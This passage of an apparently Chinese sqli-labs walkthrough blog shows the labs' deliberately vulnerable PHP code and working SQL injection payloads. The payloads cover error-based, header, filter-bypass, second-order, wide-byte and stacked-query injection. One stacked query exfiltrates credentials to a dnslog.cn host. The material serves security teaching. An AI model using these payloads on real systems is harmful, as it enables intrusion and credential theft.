name=&quot;passwd&quot; value=&quot;&quot;/&gt;</span><br><span class="line">	&lt;/div&gt;&lt;/br&gt;</span><br><span class="line">	&lt;div style=&quot; margin-top:9px;margin-left:90px;&quot;&gt;</span><br><span class="line">		&lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;Submit&quot; /&gt;</span><br><span class="line">	&lt;/div&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">        `上面是前端 通过post传参uname和passwd`</span><br><span class="line">&lt;?php</span><br><span class="line">// take the variables</span><br><span class="line">if(isset($_POST[&#x27;uname&#x27;]) &amp;&amp; isset($_POST[&#x27;passwd&#x27;]))</span><br><span class="line">&#123;</span><br><span class="line">	$uname=$_POST[&#x27;uname&#x27;];</span><br><span class="line">	$passwd=$_POST[&#x27;passwd&#x27;];</span><br><span class="line">/后端接收前端传的参数</span><br><span class="line">	//logging the connection parameters to a file for analysis.</span><br><span class="line">	$fp=fopen(&#x27;result.txt&#x27;,&#x27;a&#x27;);</span><br><span class="line">	fwrite($fp,&#x27;User Name:&#x27;.$uname);</span><br><span class="line">	fwrite($fp,&#x27;Password:&#x27;.$passwd.&quot;\n&quot;);</span><br><span class="line">	fclose($fp);</span><br><span class="line">// connectivity</span><br><span class="line">	@$sql=&quot;SELECT username, password FROM users WHERE username=&#x27;$uname&#x27; and password=&#x27;$passwd&#x27; LIMIT 0,1&quot;;</span><br><span class="line">	$result=mysql_query($sql);</span><br><span class="line">	$row = mysql_fetch_array($result);</span><br><span class="line"></span><br><span class="line">	if($row)</span><br><span class="line">	&#123;</span><br><span class="line">  		//echo &#x27;&lt;font color= &quot;#0000ff&quot;&gt;&#x27;;</span><br><span class="line">  		echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">		echo &#x27;&lt;font color= &quot;#FFFF00&quot; font size = 4&gt;&#x27;;</span><br><span class="line">		//echo &quot; You Have successfully logged in\n\n &quot; ;</span><br><span class="line">		echo &#x27;&lt;font size=&quot;3&quot; color=&quot;#0000ff&quot;&gt;&#x27;;</span><br><span class="line">		echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">		echo &#x27;Your Login name:&#x27;. $row[&#x27;username&#x27;];</span><br><span class="line">		echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">		echo &#x27;Your Password:&#x27; .$row[&#x27;password&#x27;];</span><br><span class="line">		echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">		echo &quot;&lt;/font&gt;&quot;;</span><br><span class="line">		echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">		echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">		echo &#x27;&lt;img src=&quot;../images/flag.jpg&quot;  /&gt;&#x27;;</span><br><span class="line">		/又是这里分成两部分，上面是正确回显</span><br><span class="line">		下面是报错回显</span><br><span class="line">		echo &quot;&lt;/font&gt;&quot;;</span><br><span class="line">  	&#125;</span><br><span class="line">	else</span><br><span class="line">	&#123;</span><br><span class="line">		echo &#x27;&lt;font color= &quot;#0000ff&quot; font size=&quot;3&quot;&gt;&#x27;;</span><br><span class="line">		//echo &quot;Try again looser&quot;;</span><br><span class="line">		print_r(mysql_error());</span><br><span class="line">		echo &quot;&lt;/br&gt;&quot;;</span><br><span class="line">		echo &quot;&lt;/br&gt;&quot;;</span><br><span class="line">		echo &quot;&lt;/br&gt;&quot;;</span><br><span class="line">		echo &#x27;&lt;img src=&quot;../images/slap.jpg&quot; /&gt;&#x27;;</span><br><span class="line">		echo &quot;&lt;/font&gt;&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h4 id="post传参"><a href="#post传参" class="headerlink" title="post传参"></a><code>post传参</code></h4><p>post 传参有很多方式最本质的就是在输入框传<br>然后是一些插件具有传参功能 hackbar 他们一般需要配合抓包的插件使用<br>较多的是一些抓包软件，burpsuit 等<br>他们既有抓包功能，也有重发器，测试器功能强大</p>
<h4 id="注入语句"><a href="#注入语句" class="headerlink" title="注入语句"></a><code>注入语句</code></h4><p>和 get 传参类型的语句大体相同，不同的地方有原来的 id&#x3D;1’由于 get 传参，抓包后自动写入 uname&#x2F;password&#x3D;所以只需要写后面的 admin’ 加上 sql 执行语句，原理一样，都是让系统执行完传参后继续把 sql 语句执行来回显 这里末尾注释符可用#</p>
<h3 id="实操-1"><a href="#实操-1" class="headerlink" title="实操"></a>实操</h3><p>post 传参同样有三大类</p>
<h4 id="正误回显都有"><a href="#正误回显都有" class="headerlink" title="正误回显都有"></a>正误回显都有</h4><p>在 burpsuit 重发器里传参，<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254138419-80.png" alt="在这里插入图片描述"><br>红字部分即为注入语句，这里同样只展示最后一步 其他可按照 get 传参原理<br>只需改动小部分</p>
<h4 id="没正确回显-有报错回显"><a href="#没正确回显-有报错回显" class="headerlink" title="没正确回显 有报错回显"></a>没正确回显 有报错回显</h4><p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254140293-83.png" alt="在这里插入图片描述">这里我采用了辨识度更高的时间盲注 布尔盲注同样使用</p>
<h4 id="正错回显都没有"><a href="#正错回显都没有" class="headerlink" title="正错回显都没有"></a>正错回显都没有</h4><p>同上面直接时间盲注</p>
<h2 id="基于报错注入的各种传参方式"><a href="#基于报错注入的各种传参方式" class="headerlink" title="基于报错注入的各种传参方式"></a>基于报错注入的各种传参方式</h2><h3 id="先讲报错注入"><a href="#先讲报错注入" class="headerlink" title="先讲报错注入"></a><code>先讲报错注入</code></h3><h4 id="updatexml"><a href="#updatexml" class="headerlink" title="updatexml"></a>updatexml</h4><p>updatexml (XML_document, XPath_string, new_value)<br>替换查找到的符合条件的数据</p>
<h4 id="extactvalue"><a href="#extactvalue" class="headerlink" title="extactvalue"></a>extactvalue</h4><p>extractvalue(XML_document, XPath_string)<br>对 XML 文档进行查询的函数<br>当上述两个函数的 xpath 路径出错时，将 XML_document 报错返回回来<br>注意只能返回 32 个字符，后面的可用 limit 等来限制返回的字符位置</p>
<h3 id="传参方式"><a href="#传参方式" class="headerlink" title="传参方式"></a><code>传参方式</code></h3><p>burp suite 抓包后改相应数据</p>
<h4 id="user-agent-注入"><a href="#user-agent-注入" class="headerlink" title="user-agent 注入"></a>user-agent 注入</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">User</span><span class="operator">-</span>Agent:<span class="string">&#x27;or updatexml(1,concat(0x7e,(select database()),0x7e),1) or&#x27;</span></span><br></pre></td></tr></table></figure>

<h4 id="referer-注入"><a href="#referer-注入" class="headerlink" title="referer 注入"></a>referer 注入</h4><h4 id="cookie-注入"><a href="#cookie-注入" class="headerlink" title="cookie 注入"></a>cookie 注入</h4><h4 id="base64-加密的-cookie-注入"><a href="#base64-加密的-cookie-注入" class="headerlink" title="base64 加密的 cookie 注入"></a>base64 加密的 cookie 注入</h4><p>将 payload 经 base64 加密后上传即可</p>
<h2 id="过滤注释的GET"><a href="#过滤注释的GET" class="headerlink" title="过滤注释的GET"></a><code>过滤注释的GET</code></h2><p>源码中过滤掉了注释符<br>注释符不能用了所以要在闭合上下功夫</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">?id=<span class="string">&#x27; union select 1,group_concat(username),group_concat(password) from users where 1 or &#x27;</span><span class="number">1</span><span class="string">&#x27; = &#x27;</span><span class="number">1</span></span><br><span class="line">?id=-<span class="number">1</span><span class="string">&#x27; union select 1,(select group_concat(username) from users),&#x27;</span><span class="number">3</span></span><br></pre></td></tr></table></figure>

<p>在末尾构造语句使闭合符号与语句组成一个不影响的语句<br>闭合方式多种多样</p>
<h2 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a><code>二次注入</code></h2><p>首先注册一个用户 admin‘#<br>然后登录<br>修改密码<br>当你修改密码时 后台就执行了</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">UPDATE</span> users <span class="keyword">SET</span> passwd<span class="operator">=</span>&quot;新密码&quot; <span class="keyword">WHERE</span> username <span class="operator">=</span><span class="string">&#x27; admin&#x27;</span> # <span class="string">&#x27; AND password=&#x27;</span></span><br></pre></td></tr></table></figure>

<p>也就是<br>你用 admin’#用户把 admin 用户的密码给改了</p>
<h2 id="过滤"><a href="#过滤" class="headerlink" title="过滤"></a><code>过滤</code></h2><h3 id="过滤-or-和-and"><a href="#过滤-or-和-and" class="headerlink" title="过滤 or 和 and"></a>过滤 or 和 and</h3><p>将 payload 里所有 and 和 or<br>替换为 anandd 和 oorr<br>这里 password 也要变成 passwoorrd</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">?id=-<span class="number">1</span> union select <span class="number">1</span>,<span class="number">2</span>,<span class="title function_ invoke__">group_concat</span>(<span class="title function_ invoke__">concat_ws</span>(<span class="number">0x7e</span>,username,passwoorrd)) <span class="keyword">from</span> users<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<h3 id="过滤下的报错注入"><a href="#过滤下的报错注入" class="headerlink" title="过滤下的报错注入"></a>过滤下的报错注入</h3><h4 id="26"><a href="#26" class="headerlink" title="26"></a>26</h4><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/or/i&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);			/strip out <span class="title function_ invoke__">OR</span> (non <span class="keyword">case</span> sensitive)</span><br><span class="line">	<span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/and/i&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);		/Strip out <span class="title function_ invoke__">AND</span> (non <span class="keyword">case</span> sensitive)</span><br><span class="line">	<span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[\/\*]/&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);		/strip out */</span><br><span class="line">	<span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[--]/&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);		/Strip out --</span><br><span class="line">	<span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[#]/&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);			/Strip out <span class="comment">#</span></span><br><span class="line">	<span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[\s]/&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);		/Strip out spaces</span><br><span class="line">	<span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[\/\\\\]/&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);		/Strip out slashes</span><br><span class="line">	<span class="keyword">return</span> <span class="variable">$id</span>;</span><br></pre></td></tr></table></figure>

<p>要用到||代替 or information 里的 or 要双写，用||‘1’&#x3D;‘1 来闭合</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">?id=<span class="number">0</span><span class="string">&#x27;||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=&#x27;</span>security<span class="string">&#x27;))),1)||&#x27;</span><span class="number">1</span><span class="string">&#x27;=&#x27;</span><span class="number">1</span></span><br></pre></td></tr></table></figure>

<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254143668-86.png" alt="在这里插入图片描述"></p>
<h4 id="27"><a href="#27" class="headerlink" title="27"></a>27</h4><p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254145977-89.png" alt="在这里插入图片描述"></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">?id=<span class="number">0</span><span class="string">&#x27;||updatexml(1,concat(0x7e,(SeLect(group_concat(table_name))from(information_schema.tables)where(table_schema=&#x27;</span>security<span class="string">&#x27;))),1)||&#x27;</span><span class="number">1</span><span class="string">&#x27;=&#x27;</span><span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>大小写 select 和 union</p>
<h3 id="过滤下的时间盲注"><a href="#过滤下的时间盲注" class="headerlink" title="过滤下的时间盲注"></a>过滤下的时间盲注</h3><p>26 到 27 关的 a 都是无法报错注入的<br>能用时间盲注过滤方法和不带 a 的关一样</p>
<h2 id="waf"><a href="#waf" class="headerlink" title="waf"></a><code>waf</code></h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">/ take the variables</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>]))&#123;</span><br><span class="line">	<span class="variable">$qs</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;QUERY_STRING&#x27;</span>];</span><br><span class="line">	<span class="variable">$hint</span>=<span class="variable">$qs</span>;</span><br><span class="line">	<span class="variable">$id1</span>=<span class="title function_ invoke__">java_implimentation</span>(<span class="variable">$qs</span>);</span><br><span class="line">	<span class="variable">$id</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line">	<span class="comment">//echo $id1;</span></span><br><span class="line">	<span class="title function_ invoke__">whitelist</span>(<span class="variable">$id1</span>);&#125;</span><br><span class="line"></span><br><span class="line">/WAF implimentation with a whitelist approach..... only allows input to be Numeric.</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">whitelist</span>(<span class="params"><span class="variable">$input</span></span>)</span>&#123;</span><br><span class="line">	<span class="variable">$match</span> = <span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/^\d+$/&quot;</span>, <span class="variable">$input</span>);</span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$match</span>)</span><br><span class="line">		&#123;<span class="comment">//echo &quot;you are good&quot;;</span></span><br><span class="line">			<span class="comment">//return $match;</span></span><br><span class="line">			&#125;</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">		&#123;<span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location: hacked.php&#x27;</span>);</span><br><span class="line">			<span class="comment">//echo &quot;you are bad&quot;;</span></span><br><span class="line">			&#125;</span><br><span class="line">&#125;</span><br><span class="line">/ The <span class="function"><span class="keyword">function</span> <span class="title">below</span> <span class="title">immitates</span> <span class="title">the</span> <span class="title">behavior</span> <span class="title">of</span> <span class="title">parameters</span> <span class="title">when</span> <span class="title">subject</span> <span class="title">to</span> <span class="title">HPP</span> (<span class="params">HTTP Parameter Pollution</span>).</span></span><br><span class="line"><span class="function"><span class="title">function</span> <span class="title">java_implimentation</span>(<span class="params"><span class="variable">$query_string</span></span>)</span>&#123;</span><br><span class="line">	<span class="variable">$q_s</span> = <span class="variable">$query_string</span>;</span><br><span class="line">	<span class="variable">$qs_array</span>= <span class="title function_ invoke__">explode</span>(<span class="string">&quot;&amp;&quot;</span>,<span class="variable">$q_s</span>);</span><br><span class="line">	<span class="keyword">foreach</span>(<span class="variable">$qs_array</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>)&#123;</span><br><span class="line">		<span class="variable">$val</span>=<span class="title function_ invoke__">substr</span>(<span class="variable">$value</span>,<span class="number">0</span>,<span class="number">2</span>);</span><br><span class="line">		<span class="keyword">if</span>(<span class="variable">$val</span>==<span class="string">&quot;id&quot;</span>)&#123;</span><br><span class="line">			<span class="variable">$id_value</span>=<span class="title function_ invoke__">substr</span>(<span class="variable">$value</span>,<span class="number">3</span>,<span class="number">30</span>);</span><br><span class="line">			<span class="keyword">return</span> <span class="variable">$id_value</span>;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">			<span class="keyword">break</span>;&#125;</span><br><span class="line">		&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>java_implimentation 模拟 tomcat 的查询函数处理<br>whitelist 白名单过滤 检测到不符合规则就重定向<br>漏洞是 whitelist 只检测了 java_implimentation 输出的第一个参数$id_value<br>后面的逃过检测 注入点在后面<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254151996-92.png" alt="在这里插入图片描述"  /></p>
<h2 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a><code>宽字节注入</code></h2><p>MySQL 在使用 GBK 编码的时候，会认为两个字符为一个汉字，因为过滤方法主要就是在敏感字符前面添加 反斜杠 \，所以这里想办法干掉反斜杠即可。<br>urlencode(’) &#x3D; %5c%27，我们在%5c%27 前面添加%df，形 成%df%5c%27，MySQL 在 GBK 编码方式的时候会将两个字节当做一个汉字，这个时候就把%df%5c 当做是一个汉字，%27 则作为一个单独的符号在外面，同时也就达到了我们的目的。<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254154496-95.png" alt="在这里插入图片描述"></p>
<h3 id="结束注释"><a href="#结束注释" class="headerlink" title="结束注释"></a><code>结束注释</code></h3><p>当转译为‘&#x2F;时可用’&#x2F;**&#x2F;来<code>结束注释</code></p>
<h2 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a><code>堆叠注入</code></h2><p>在 SQL 中，分号（;）是用来表示一条 sql 语句的结束。结束一个 sql 语句后继续构造下一条语句，会一起执行 因此产生了堆叠注入。而 union injection（联合注入）也是将两条语句合并在一起，两者之间区别在于 union 或者 union all 执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句<br>堆叠注入为攻击者提供了很多的攻击手段，通过添加一个新 的查询或者终止查询，可以达到修改数据和调用存储过程的目的。这种技术在 SQL 注入中还是比较频繁的。<br>如下展示了堆叠注入插入了一个用户数据</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254157372-98.png" alt="在这里插入图片描述"><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254159693-101.png" alt="在这里插入图片描述">同时也可以进行 dnslog 注入</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">?id=<span class="number">1</span><span class="string">&#x27;;select load_file(concat(&#x27;</span><span class="comment">//&#x27;,(select hex(concat_ws(&#x27;~&#x27;,username,password)) from users limit 0,1),&#x27;.au0mvd.dnslog.cn/1.txt&#x27;));--+</span></span><br></pre></td></tr></table></figure>

<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254161931-104.png" alt="在这里插入图片描述"></p>
<figure class="highlight css"><table><tr><td class="code"><pre><span class="line">desc查看表结构的详细信息</span><br><span class="line">desc table_name;</span><br><span class="line">此处desc是describe的缩写，用法: desc 表名/查询语句</span><br></pre></td></tr></table></figure>

<p>handler 适用于 select 等过滤</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">handler handler_table <span class="keyword">open</span>;</span><br><span class="line">handler handler_table read <span class="keyword">first</span>;</span><br><span class="line">handler handler_table read next;</span><br><span class="line">……</span><br><span class="line">handler handler_table <span class="keyword">close</span>;</span><br></pre></td></tr></table></figure>

<h2 id="二次注入进阶"><a href="#二次注入进阶" class="headerlink" title="二次注入进阶"></a>二次注入进阶</h2><h3 id="需成功登录才能二次注入"><a href="#需成功登录才能二次注入" class="headerlink" title="需成功登录才能二次注入"></a>需成功登录才能二次注入</h3><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">sqllogin</span>(<span class="params"><span class="variable">$host</span>,<span class="variable">$dbuser</span>,<span class="variable">$dbpass</span>, <span class="variable">$dbname</span></span>)</span>&#123;</span><br><span class="line">   <span class="comment">// connectivity</span></span><br><span class="line"><span class="comment">//mysql connections for stacked query examples.</span></span><br><span class="line"><span class="variable">$con1</span> = <span class="title function_ invoke__">mysqli_connect</span>(<span class="variable">$host</span>,<span class="variable">$dbuser</span>,<span class="variable">$dbpass</span>, <span class="variable">$dbname</span>);</span><br><span class="line"></span><br><span class="line">   <span class="variable">$username</span> = <span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$con1</span>, <span class="variable">$_POST</span>[<span class="string">&quot;login_user&quot;</span>]);</span><br><span class="line">   <span class="variable">$password</span> = <span class="variable">$_POST</span>[<span class="string">&quot;login_password&quot;</span>];</span><br><span class="line"></span><br><span class="line">   <span class="comment">// Check connection</span></span><br><span class="line">   <span class="keyword">if</span> (<span class="title function_ invoke__">mysqli_connect_errno</span>(<span class="variable">$con1</span>))</span><br><span class="line">   &#123;</span><br><span class="line">       <span class="keyword">echo</span> <span class="string">&quot;Failed to connect to MySQL: &quot;</span> . <span class="title function_ invoke__">mysqli_connect_error</span>();</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="keyword">else</span></span><br><span class="line">   &#123;</span><br><span class="line">       @<span class="title function_ invoke__">mysqli_select_db</span>(<span class="variable">$con1</span>, <span class="variable">$dbname</span>) <span class="keyword">or</span> <span class="keyword">die</span> ( <span class="string">&quot;Unable to connect to the database ######: &quot;</span>);</span><br><span class="line">   &#125;</span><br><span class="line"> <span class="comment">/* execute multi query */</span></span><br><span class="line"> 	<span class="variable">$sql</span> = <span class="string">&quot;SELECT * FROM users WHERE username=&#x27;<span class="subst">$username</span>&#x27; and password=&#x27;<span class="subst">$password</span>&#x27;&quot;</span>;</span><br><span class="line">   <span class="keyword">if</span> (@<span class="title function_ invoke__">mysqli_multi_query</span>(<span class="variable">$con1</span>, <span class="variable">$sql</span>))</span><br><span class="line">   &#123;</span><br><span class="line">        <span class="comment">/* store first result set */</span></span><br><span class="line">      <span class="keyword">if</span>(<span class="variable">$result</span> = @<span class="title function_ invoke__">mysqli_store_result</span>(<span class="variable">$con1</span>))</span><br><span class="line">      &#123;</span><br><span class="line">	 <span class="keyword">if</span>(<span class="variable">$row</span> = @<span class="title function_ invoke__">mysqli_fetch_row</span>(<span class="variable">$result</span>))&#123;</span><br><span class="line">	    <span class="keyword">if</span> (<span class="variable">$row</span>[<span class="number">1</span>]) &#123;</span><br><span class="line">	       <span class="keyword">return</span> <span class="variable">$row</span>[<span class="number">1</span>];</span><br><span class="line">	    &#125;</span><br><span class="line">	    <span class="keyword">else</span>&#123;</span><br><span class="line">	       <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">	    &#125;</span><br><span class="line">	 &#125;</span><br><span class="line">      &#125;</span><br><span class="line"></span><br><span class="line">      <span class="keyword">else</span>  &#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&#x27;&lt;font size=&quot;5&quot; color= &quot;#FFFF00&quot;&gt;&#x27;</span>;</span><br><span class="line">	<span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$con1</span>));</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;</span><br><span class="line">      &#125;</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="keyword">else</span></span><br><span class="line">   &#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&#x27;&lt;font size=&quot;5&quot; color= &quot;#FFFF00&quot;&gt;&#x27;</span>;</span><br><span class="line">	<span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$con1</span>));</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>这里对 username 和 password 过滤不强<br>可通过万能密码</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="number">1</span>’ <span class="keyword">or</span> <span class="string">&#x27;1&#x27;</span>=<span class="string">&#x27;1</span></span><br></pre></td></tr></table></figure>

<p>登录<br>接下来通过修改密码界面二次注入</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?</span>PHP</span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_COOKIE</span>[<span class="string">&quot;Auth&quot;</span>]))&#123;</span><br><span class="line">	<span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">&quot;username&quot;</span>])) &#123;</span><br><span class="line">  		<span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location: index.php&#x27;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location: index.php&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//including the Mysql connect parameters.</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;../sql-connections/sql-connect.php&quot;</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>]))&#123;</span><br><span class="line">	<span class="comment"># Validating the user input........</span></span><br><span class="line">	<span class="variable">$username</span>= <span class="variable">$_SESSION</span>[<span class="string">&quot;username&quot;</span>];</span><br><span class="line">	<span class="variable">$curr_pass</span>= <span class="title function_ invoke__">mysql_real_escape_string</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;current_password&#x27;</span>]);<span class="comment">//原密码 还是万能密码绕过</span></span><br><span class="line">	<span class="variable">$pass</span>= <span class="title function_ invoke__">mysql_real_escape_string</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>]);<span class="comment">//新密码</span></span><br><span class="line">	<span class="variable">$re_pass</span>= <span class="title function_ invoke__">mysql_real_escape_string</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;re_password&#x27;</span>]);</span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$pass</span>==<span class="variable">$re_pass</span>)&#123;</span><br><span class="line">		<span class="variable">$sql</span> = <span class="string">&quot;UPDATE users SET PASSWORD=&#x27;<span class="subst">$pass</span>&#x27; where username=&#x27;<span class="subst">$username</span>&#x27; and password=&#x27;<span class="subst">$curr_pass</span>&#x27; &quot;</span>;</span><br><span class="line">		<span class="variable">$res</span> = <span class="title function_ invoke__">mysql_query</span>(<span class="variable">$sql</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">&#x27;You tried to be smart, Try harder!!!! :( &#x27;</span>);</span><br><span class="line">		<span class="variable">$row</span> = <span class="title function_ invoke__">mysql_affected_rows</span>();</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&#x27;&lt;font size=&quot;3&quot; color=&quot;#FFFF00&quot;&gt;&#x27;</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&#x27;&lt;center&gt;&#x27;</span>;</span><br><span class="line">		<span class="keyword">if</span>(<span class="variable">$row</span>==<span class="number">1</span>)&#123;</span><br><span class="line">			<span class="comment">//echo &quot;Password successfully updated&quot;;</span></span><br><span class="line">			<span class="keyword">echo</span> <span class="string">&#x27;&lt;img src=&quot;../images/password-updated.jpg&quot;&gt;&#x27;</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		<span class="keyword">else</span>&#123;</span><br><span class="line">			<span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location: failed.php&#x27;</span>);</span><br><span class="line">			<span class="comment">//echo &#x27;You tried to be smart, Try harder!!!! :( &#x27;;</span></span><br><span class="line"></span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&#x27;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&lt;center&gt;&#x27;</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;Make sure New Password and Retype Password fields have same value&quot;</span>;</span><br><span class="line">		<span class="title function_ invoke__">header</span>(<span class="string">&#x27;refresh:2, url=index.php&#x27;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit1&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">	<span class="title function_ invoke__">session_destroy</span>();</span><br><span class="line">	<span class="title function_ invoke__">setcookie</span>(<span class="string">&#x27;Auth&#x27;</span>, <span class="number">1</span> , <span class="title function_ invoke__">time</span>()-<span class="number">3600</span>);</span><br><span class="line">	<span class="title function_ invoke__">header</span> (<span class="string">&#x27;Location: index.php&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>他用户名通过 session 获取，所以无法更改其他用户</p>
